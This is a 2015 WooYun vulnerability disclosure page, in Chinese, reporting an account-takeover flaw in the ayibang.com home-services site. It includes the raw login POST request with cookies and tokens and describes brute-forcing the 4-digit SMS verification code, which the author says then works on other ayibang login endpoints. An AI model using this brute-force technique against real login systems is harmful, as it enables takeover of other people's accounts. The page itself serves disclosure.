当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0149880

漏洞标题:阿姨帮任意用户登录

相关厂商:ayibang.com

漏洞作者: 路人甲

提交时间:2015-10-27 17:25

修复时间:2015-11-01 17:26

公开时间:2015-11-01 17:26

漏洞类型:设计缺陷/逻辑错误

危害等级:中

自评Rank:10

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-10-27: 细节已通知厂商并且等待厂商处理中
2015-11-01: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

阿姨帮任意用户登录

详细说明:

阿姨帮任意用户登录
问题网站:red.ayibang.com
HI~你好~并未与WooYun-2015-122517 重复,域名不同


red.ayibang.com可以登录阿姨帮,且没有验证码,而爆破出的手机登录验证码可用于多个平台登录


POST /login HTTP/1.1
Host: red.ayibang.com
Proxy-Connection: keep-alive
Content-Length: 593
Accept: application/json
Origin: http://red.ayibang.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.130 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: http://red.ayibang.com/login?data=YTo1OntzOjEwOiJvcmRlcl90aW1lIjtzOjE2OiIyMDE1LTEwLTI4IDEwOjAwIjtzOjEzOiJvcmRlcl9hZGRyZXNzIjtzOjQ6InpjYXMiO3M6NDoiYXJlYSI7czo5OiJ1bmRlZmluZWQiO3M6Nzoia2V5d29yZCI7czoyMDoicHJvamVjdF9jbGVhbl9mcmlkZ2UiO3M6MTI6Im9yZGVyX3JlbWFyayI7czo3OiJkYXNkYXNkIjt9&return_url=/appointment/?keyword=project_clean_fridge
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: PHPSESSID=29dbme5s6qol1ldu2ut5ruucv1; Hm_lvt_26a1b3a2f43711fdc32ef64c66a91ec0=1445855848; Hm_lpvt_26a1b3a2f43711fdc32ef64c66a91ec0=1445857939; city=HutcOBNxHtBQ1Zt9Vf1bPK5HlALWxCB%2FOysewRC7UNE%3D; token=jEjKL0ScM2Sv160VZ4mawLDSW6N8eUmgMrIGw8%2BxPxw%3D
Connection: close
phone=13333333333&code=5621&return_url=%2Fappointment%2F%3Fkeyword%3Dproject_clean_fridge%26data%3DYTo1OntzOjEwOiJvcmRlcl90aW1lIjtzOjE2OiIyMDE1LTEwLTI4IDEwOjAwIjtzOjEzOiJvcmRlcl9hZGRyZXNzIjtzOjQ6InpjYXMiO3M6NDoiYXJlYSI7czo5OiJ1bmRlZmluZWQiO3M6Nzoia2V5d29yZCI7czoyMDoicHJvamVjdF9jbGVhbl9mcmlkZ2UiO3M6MTI6Im9yZGVyX3JlbWFyayI7czo3OiJkYXNkYXNkIjt9&data=YTo1OntzOjEwOiJvcmRlcl90aW1lIjtzOjE2OiIyMDE1LTEwLTI4IDEwOjAwIjtzOjEzOiJvcmRlcl9hZGRyZXNzIjtzOjQ6InpjYXMiO3M6NDoiYXJlYSI7czo5OiJ1bmRlZmluZWQiO3M6Nzoia2V5d29yZCI7czoyMDoicHJvamVjdF9jbGVhbl9mcmlkZ2UiO3M6MTI6Im9yZGVyX3JlbWFyayI7czo3OiJkYXNkYXNkIjt9


以手机13333333333为例:

2.JPG


抓包并爆破,成功跑出4位验证码:

3.JPG


看一下成功与失败的返回包:

5.JPG


4.JPG


=====
然后这个验证码可以在任意登陆端口进行登录,包括手机端和WEB端,例如
http://www.ayibang.com/order?_m= 用这个验证码登陆成功:

6.JPG


333.JPG

漏洞证明:

都在上面

修复方案:

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-11-01 17:26

厂商回复:

漏洞Rank:2 (WooYun评价)

最新状态:

暂无